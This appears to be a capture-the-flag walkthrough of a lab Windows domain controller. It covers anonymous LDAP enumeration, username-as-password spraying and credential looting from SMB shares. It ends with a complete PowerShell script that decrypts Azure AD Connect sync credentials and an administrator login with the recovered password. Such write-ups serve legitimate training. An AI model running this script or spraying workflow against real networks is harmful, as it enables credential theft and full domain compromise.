Recon
Nmap scan reveals domain controller for megabank.local, dns, ldap and smb.
└──╼ [★]$ nmap -p- -A 10.129.228.111
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-11 08:36:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49746/tcp open msrpc Microsoft Windows RPC
Host script results:
| smb2-time:
| date: 2025-08-11T08:37:25
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and requiredWe can check if we can further enumerate the domain.
┌─[eu-dedivip-1]─[10.10.14.49]─[abno525@htb-6owi1lm3xr]─[~/my_data]
└──╼ [★]$ python windapsearch.py -u "" --dc-ip 10.129.228.111
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.228.111
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=MEGABANK,DC=LOCAL
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[*] Bye!And then enumerate the users.
└──╼ [★]$ python windapsearch.py -u "" --dc-ip 10.129.228.111 -U --admin-objects
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.228.111
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=MEGABANK,DC=LOCAL
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[+] Found 10 users:
cn: Guest
cn: AAD_987d7f2f57d2
cn: Mike Hope
userPrincipalName: mhope@MEGABANK.LOCAL
cn: SABatchJobs
userPrincipalName: SABatchJobs@MEGABANK.LOCAL
cn: svc-ata
userPrincipalName: svc-ata@MEGABANK.LOCAL
cn: svc-bexec
userPrincipalName: svc-bexec@MEGABANK.LOCAL
cn: svc-netapp
userPrincipalName: svc-netapp@MEGABANK.LOCAL
cn: Dimitris Galanos
userPrincipalName: dgalanos@MEGABANK.LOCAL
cn: Ray O'Leary
userPrincipalName: roleary@MEGABANK.LOCAL
cn: Sally Morgan
userPrincipalName: smorgan@MEGABANK.LOCAL
[+] Attempting to enumerate all admin (protected) objects
[+] Found 0 Admin Objects:
[*] Bye!There are two interesting accoutn names: AAD_987d7f2f57d2 and SABatchJobs@MEGABANK.LOCAL. AAD indicates that Azure Active Directory is installed, so presumeably there is also Remote Managment.
└──╼ [★]$ python windapsearch.py -u "" --dc-ip 10.129.228.111 -U -m "Remote Management Users"
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.228.111
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=MEGABANK,DC=LOCAL
<snip>
[+] Attempting to enumerate full DN for group: Remote Management Users
[+] Using DN: CN=Remote Management Users,CN=Builtin,DC=MEGABANK,DC=LOCAL
[+] Found 1 members:
b'CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL'We can check if we can list shares.
└──╼ [★]$ smbclient -N -L \\\\10.129.228.111\\
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.111 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableWe can do further enumeration with enum4linux -A <ip> and check that there is no lockout policy.
Domain password information:
Password history length: 24
Minimum password length: 7
Maximum password age: 41 days 23 hours 53 minutes
Password properties:
- DOMAIN_PASSWORD_COMPLEX: false
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
Lockout observation window: 30 minutes
Lockout duration: 30 minutes
Lockout threshold: None
Domain logoff information:
Force logoff time: not setFoothold
To start spraying, we can get all the users into a file. Then, we can check if anyone uses their username as their password.
└──╼ [★]$ crackmapexec smb 10.129.228.111 -d megabank -u /tmp/users.txt -p /tmp/users.txt
[*] First time use detected
[*] Creating home directory structure
<snip>
[*] Initializing RDP protocol database
[*] Copying default configuration file
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
<snip>
SMB 10.129.228.111 445 MONTEVERDE [+] megabank\SABatchJobs:SABatchJobs We can check if we can execute commands on server. We cant.
smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.129.228.111 -x whoami
We can then check for any interesting files.
└──╼ [★]$ smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.129.228.111 -A '(xlsx|docx|txt|xml)' -R
[+] IP: 10.129.228.111:445 Name: 10.129.228.111
[+] Starting search for files matching '(xlsx|docx|txt|xml)' on share azure_uploads.
[+] Starting search for files matching '(xlsx|docx|txt|xml)' on share IPC$.
[+] Starting search for files matching '(xlsx|docx|txt|xml)' on share NETLOGON.
[+] Starting search for files matching '(xlsx|docx|txt|xml)' on share SYSVOL.
[+] Starting search for files matching '(xlsx|docx|txt|xml)' on share users$.
[+] Match found! Downloading: users$\mhope\azure.xml└──╼ [★]$ cat 10.129.228.111-users_mhope_azure.xml
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>We can then check if mhope uses it, as he has remote access. evil-winrm -i 10.129.228.111 -u mhope -p '4n0therD4y@n0th3r$'. It works!
Priv esc
First we can check what is installed on the server.
*Evil-WinRM* PS C:\Users\mhope\Desktop> cd "C:\Program Files"
*Evil-WinRM* PS C:\Program Files> ls
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 9:36 PM Common Files
d----- 1/2/2020 2:46 PM internet explorer
d----- 1/2/2020 2:38 PM Microsoft Analysis Services
d----- 1/2/2020 2:51 PM Microsoft Azure Active Directory Connect
d----- 1/2/2020 3:37 PM Microsoft Azure Active Directory Connect Upgrader
d----- 1/2/2020 3:02 PM Microsoft Azure AD Connect Health Sync Agent
d----- 1/2/2020 2:53 PM Microsoft Azure AD Sync
d----- 1/2/2020 2:38 PM Microsoft SQL Server
d----- 1/2/2020 2:25 PM Microsoft Visual Studio 10.0
d----- 1/2/2020 2:32 PM Microsoft.NET
d----- 1/3/2020 5:28 AM PackageManagement
d----- 1/2/2020 9:37 PM VMware
d-r--- 1/2/2020 2:46 PM Windows Defender
d----- 1/2/2020 2:46 PM Windows Defender Advanced Threat Protection
d----- 9/15/2018 12:19 AM Windows Mail
d----- 1/2/2020 2:46 PM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 1/2/2020 2:46 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM Windows Security
d----- 1/3/2020 5:28 AM WindowsPowerShellFurther enumeration tools have restricted access.
*Evil-WinRM* PS C:\Program Files> wmic.exe service get name
WMIC.exe : ERROR:
+ CategoryInfo : NotSpecified: (ERROR::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Description = Access denied
*Evil-WinRM* PS C:\Program Files> sc.exe query state= all
[SC] OpenSCManager FAILED 5:
Access is denied.
*Evil-WinRM* PS C:\Program Files> net.exe start
net.exe : System error 5 has occurred.
+ CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Access is denied.We can though continue enumeration of ADSync, which is used by AAD, and find its version.
*Evil-WinRM* PS C:\Program Files> Get-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\ADSync
Hive: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Name Property
---- --------
ADSync Type : 16
Start : 2
ErrorControl : 1
ImagePath : "C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe"
DisplayName : Microsoft Azure AD Sync
DependOnService : {winmgmt}
ObjectName : MEGABANK\AAD_987d7f2f57d2
Description : Enables integration and management of identity information across multiple directories, systems and platforms. If this service is stopped or disabled, no synchronization or password management for
objects in connected data
sources will be performed.
FailureActions : {0, 0, 0, 0...}
DelayedAutostart : 1We can then get version of the binary.
*Evil-WinRM* PS C:\Program Files> Get-ItemProperty -Path "C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe" | Format-list -Property * -Force
PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe
PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Program Files\Microsoft Azure AD Sync\Bin
PSChildName : miiserver.exe
PSDrive : C
PSProvider : Microsoft.PowerShell.Core\FileSystem
Mode : -a----
VersionInfo : File: C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe
InternalName: miiserver
OriginalFilename: miiserver.exe
FileVersion: 1.1.882.0
FileDescription: AD-IAM-HybridSync master (0eb4240d4) Azure AD Connect synchronization service.
Product: Microsoft® Azure® AD Connect
ProductVersion: 1.1.882.0sqlcmd -S MONTEVERDE -Q “use ADsync; select instance_id,keyset_id,entropy from mms_server_configuration”
Function Get-ADConnectPassword{
Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"
$key_id = 1
$instance_id = [GUID]"1852B527-DD4F-4ECF-B541-EFCCBFF29E31"
$entropy = [GUID]"194EC2FC-F186-46CF-B44D-071EB61F49CD"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList
"Server=MONTEVERDE;Database=ADSync;Trusted_Connection=true"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName
Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name =
'Password'; Expression = {$_.node.InnerXML}}
Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
}evil-winrm -i 10.10.10.172 -u mhope -p “4n0therD4y@n0th3r$” -s . adconnect.ps1
adconnect.ps1
Get-ADConnectPassword
evil-winrm -i 10.10.10.172 -u administrator -p ‘d0m@in4dminyeah!’